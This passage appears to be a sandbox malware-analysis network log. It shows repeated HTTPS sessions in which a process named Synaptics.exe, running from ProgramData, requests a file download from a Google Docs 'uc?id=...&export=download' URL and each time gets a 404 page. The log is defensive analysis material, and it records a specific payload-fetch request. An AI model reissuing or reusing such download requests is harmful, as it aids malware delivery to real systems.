                                                                                                                                                                                        2022-05-17 11:31:38 UTC216INData Raw: 30 25 7d 7d 23 6c 6f 67 6f 7b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 68 65 69 67 68 74 3a 35 34 70 78 3b 77 69 64 74 68 3a 31 35 30 70 78 7d 3c 2f 73 74 79 6c 65 3e 3c 6d 61 69 6e 20 69 64 3d 22 61 66 2d 65 72 72 6f 72 2d 63 6f 6e 74 61 69 6e 65 72 22 20 72 6f 6c 65 3d 22 6d 61 69 6e 22 3e 3c 61 20 68 72 65 66 3d 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 3e 3c 73 70 61 6e 20 69 64 3d 6c 6f 67 6f 20 61 72 69 61 2d 6c 61 62 65 6c 3d 47 6f 6f 67 6c 65 20 72 6f 6c 65 3d 69 6d 67 3e 3c 2f 73 70 61 6e 3e 3c 2f 61 3e 3c 70 3e 3c 62 3e 34 30 34 2e 3c 2f 62 3e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20
                                                                                                                                                                                        Data Ascii: 0%}}#logo{display:inline-block;height:54px;width:150px}</style><main id="af-error-container" role="main"><a href=//www.google.com><span id=logo aria-label=Google role=img></span></a><p><b>404.</b> <ins>Thats an error.</ins><p>The requested URL was not
                                                                                                                                                                                        2022-05-17 11:31:38 UTC216INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                        71192.168.2.349823142.250.186.46443C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                                                                                        2022-05-17 11:31:38 UTC213OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                                        User-Agent: Synaptics.exe
                                                                                                                                                                                        Host: docs.google.com
                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                        2022-05-17 11:31:38 UTC217INHTTP/1.1 404 Not Found
                                                                                                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                        Date: Tue, 17 May 2022 11:31:38 GMT
                                                                                                                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-GweK7n/Y29h3e5oAWsYN4w' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                                        Cross-Origin-Opener-Policy: same-origin; report-to="DriveUntrustedContentHttp"
                                                                                                                                                                                        Report-To: {"group":"DriveUntrustedContentHttp","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/DriveUntrustedContentHttp/external"}]}
                                                                                                                                                                                        Server: ESF
                                                                                                                                                                                        X-XSS-Protection: 0
                                                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
                                                                                                                                                                                        Accept-Ranges: none
                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                        Connection: close
                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                        2022-05-17 11:31:38 UTC218INData Raw: 36 36 61 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 50 56 43 65 47 35 31 57 64 4b 48 4a 34 7a 49 75 35 34 6f 6a 2b 67 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73
                                                                                                                                                                                        Data Ascii: 66a<html lang=en><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="PVCeG51WdKHJ4zIu54oj+g">*{margin:0;padding:0}html,code{font:15px/22px arial,sans
                                                                                                                                                                                        2022-05-17 11:31:38 UTC219INData Raw: 6c 3d 47 6f 6f 67 6c 65 20 72 6f 6c 65 3d 69 6d 67 3e 3c 2f 73 70 61 6e 3e 3c 2f 61 3e 3c 70 3e 3c 62 3e 34 30 34 2e 3c 2f 62 3e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e 0d 0a
                                                                                                                                                                                        Data Ascii: l=Google role=img></span></a><p><b>404.</b> <ins>Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>
                                                                                                                                                                                        2022-05-17 11:31:38 UTC220INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                        72192.168.2.349824142.250.186.46443C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                                                                                        2022-05-17 11:31:38 UTC216OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                                        User-Agent: Synaptics.exe
                                                                                                                                                                                        Host: docs.google.com
                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                        2022-05-17 11:31:38 UTC220INHTTP/1.1 404 Not Found
                                                                                                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                        Date: Tue, 17 May 2022 11:31:38 GMT
                                                                                                                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                        Report-To: {"group":"DriveUntrustedContentHttp","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/DriveUntrustedContentHttp/external"}]}
                                                                                                                                                                                        Cross-Origin-Opener-Policy: same-origin; report-to="DriveUntrustedContentHttp"
                                                                                                                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-TiFM2Vs2RShj4U+Fatfezg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                                        Server: ESF
                                                                                                                                                                                        X-XSS-Protection: 0
                                                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
                                                                                                                                                                                        Accept-Ranges: none
                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                        Connection: close
                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                        2022-05-17 11:31:38 UTC221INData Raw: 36 36 61 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 32 43 42 6a 4e 4f 63 73 6f 57 34 47 35 76 63 45 58 6b 39 6d 41 51 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73
                                                                                                                                                                                        Data Ascii: 66a<html lang=en><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="2CBjNOcsoW4G5vcEXk9mAQ">*{margin:0;padding:0}html,code{font:15px/22px arial,sans
                                                                                                                                                                                        2022-05-17 11:31:38 UTC223INData Raw: 6c 3d 47 6f 6f 67 6c 65 20 72 6f 6c 65 3d 69 6d 67 3e 3c 2f 73 70 61 6e 3e 3c 2f 61 3e 3c 70 3e 3c 62 3e 34 30 34 2e 3c 2f 62 3e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e 0d 0a
                                                                                                                                                                                        Data Ascii: l=Google role=img></span></a><p><b>404.</b> <ins>Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>
                                                                                                                                                                                        2022-05-17 11:31:38 UTC223INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                        73192.168.2.349825142.250.186.46443C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                                                                                        2022-05-17 11:31:38 UTC220OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                                        User-Agent: Synaptics.exe
                                                                                                                                                                                        Host: docs.google.com
                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                        2022-05-17 11:31:38 UTC223INHTTP/1.1 404 Not Found
                                                                                                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                        Date: Tue, 17 May 2022 11:31:38 GMT
                                                                                                                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-81P8juAhq8O5vDMK4PEdVg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                                        Server: ESF
                                                                                                                                                                                        X-XSS-Protection: 0
                                                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
                                                                                                                                                                                        Accept-Ranges: none
                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                        Connection: close
                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                        2022-05-17 11:31:38 UTC224INData Raw: 36 36 61 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 3c 6d 65 74 61 20 63 68
                                                                                                                                                                                        Data Ascii: 66a<html lang=en><meta ch
                                                                                                                                                                                        2022-05-17 11:31:38 UTC224INData Raw: 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 6c 6d 43 56 71 48 35 57 76 7a 58 62 6e 55 6d 46 58 4f 55 33 37 51 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66
                                                                                                                                                                                        Data Ascii: arset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="lmCVqH5WvzXbnUmFXOU37Q">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff
                                                                                                                                                                                        2022-05-17 11:31:38 UTC225INData Raw: 30 25 7d 7d 23 6c 6f 67 6f 7b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 68 65 69 67 68 74 3a 35 34 70 78 3b 77 69 64 74 68 3a 31 35 30 70 78 7d 3c 2f 73 74 79 6c 65 3e 3c 6d 61 69 6e 20 69 64 3d 22 61 66 2d 65 72 72 6f 72 2d 63 6f 6e 74 61 69 6e 65 72 22 20 72 6f 6c 65 3d 22 6d 61 69 6e 22 3e 3c 61 20 68 72 65 66 3d 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 3e 3c 73 70 61 6e 20 69 64 3d 6c 6f 67 6f 20 61 72 69 61 2d 6c 61 62 65 6c 3d 47 6f 6f 67 6c 65 20 72 6f 6c 65 3d 69 6d 67 3e 3c 2f 73 70 61 6e 3e 3c 2f 61 3e 3c 70 3e 3c 62 3e 34 30 34 2e 3c 2f 62 3e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20
                                                                                                                                                                                        Data Ascii: 0%}}#logo{display:inline-block;height:54px;width:150px}</style><main id="af-error-container" role="main"><a href=//www.google.com><span id=logo aria-label=Google role=img></span></a><p><b>404.</b> <ins>Thats an error.</ins><p>The requested URL was not
                                                                                                                                                                                        2022-05-17 11:31:38 UTC226INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                        74192.168.2.349826142.250.186.46443C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                                                                                        2022-05-17 11:31:38 UTC223OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                                        User-Agent: Synaptics.exe
                                                                                                                                                                                        Host: docs.google.com
                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                        2022-05-17 11:31:39 UTC226INHTTP/1.1 404 Not Found
                                                                                                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                        Date: Tue, 17 May 2022 11:31:38 GMT
                                                                                                                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-9XDbunjwpty1Fw1nmUokRA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                                        Server: ESF
                                                                                                                                                                                        X-XSS-Protection: 0
                                                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
                                                                                                                                                                                        Accept-Ranges: none
                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                        Connection: close
                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                        2022-05-17 11:31:39 UTC227INData Raw: 36 36 61 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 3c 6d 65 74 61 20 63 68
                                                                                                                                                                                        Data Ascii: 66a<html lang=en><meta ch
                                                                                                                                                                                        2022-05-17 11:31:39 UTC227INData Raw: 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 6b 42 4a 4c 42 70 57 78 7a 66 51 70 77 31 44 4b 38 47 69 32 37 77 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66
                                                                                                                                                                                        Data Ascii: arset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="kBJLBpWxzfQpw1DK8Gi27w">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff
                                                                                                                                                                                        2022-05-17 11:31:39 UTC228INData Raw: 30 25 7d 7d 23 6c 6f 67 6f 7b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 68 65 69 67 68 74 3a 35 34 70 78 3b 77 69 64 74 68 3a 31 35 30 70 78 7d 3c 2f 73 74 79 6c 65 3e 3c 6d 61 69 6e 20 69 64 3d 22 61 66 2d 65 72 72 6f 72 2d 63 6f 6e 74 61 69 6e 65 72 22 20 72 6f 6c 65 3d 22 6d 61 69 6e 22 3e 3c 61 20 68 72 65 66 3d 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 3e 3c 73 70 61 6e 20 69 64 3d 6c 6f 67 6f 20 61 72 69 61 2d 6c 61 62 65 6c 3d 47 6f 6f 67 6c 65 20 72 6f 6c 65 3d 69 6d 67 3e 3c 2f 73 70 61 6e 3e 3c 2f 61 3e 3c 70 3e 3c 62 3e 34 30 34 2e 3c 2f 62 3e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20
                                                                                                                                                                                        Data Ascii: 0%}}#logo{display:inline-block;height:54px;width:150px}</style><main id="af-error-container" role="main"><a href=//www.google.com><span id=logo aria-label=Google role=img></span></a><p><b>404.</b> <ins>Thats an error.</ins><p>The requested URL was not
                                                                                                                                                                                        2022-05-17 11:31:39 UTC229INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                        75192.168.2.349827142.250.186.46443C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                                                                                        2022-05-17 11:31:38 UTC226OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                                        User-Agent: Synaptics.exe
                                                                                                                                                                                        Host: docs.google.com
                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                        2022-05-17 11:31:39 UTC229INHTTP/1.1 404 Not Found
                                                                                                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                        Date: Tue, 17 May 2022 11:31:39 GMT
                                                                                                                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-olL2wAzIjiC+pyTWE0AvFA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                                        Server: ESF
                                                                                                                                                                                        X-XSS-Protection: 0
                                                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
                                                                                                                                                                                        Accept-Ranges: none
                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                        Connection: close
                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                        2022-05-17 11:31:39 UTC230INData Raw: 36 36 61 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 3c 6d 65 74 61 20 63 68
                                                                                                                                                                                        Data Ascii: 66a<html lang=en><meta ch
                                                                                                                                                                                        2022-05-17 11:31:39 UTC230INData Raw: 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 52 57 37 6e 73 73 70 71 42 31 7a 5a 68 6f 4c 53 55 6b 35 72 41 77 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66
                                                                                                                                                                                        Data Ascii: arset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="RW7nsspqB1zZhoLSUk5rAw">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff
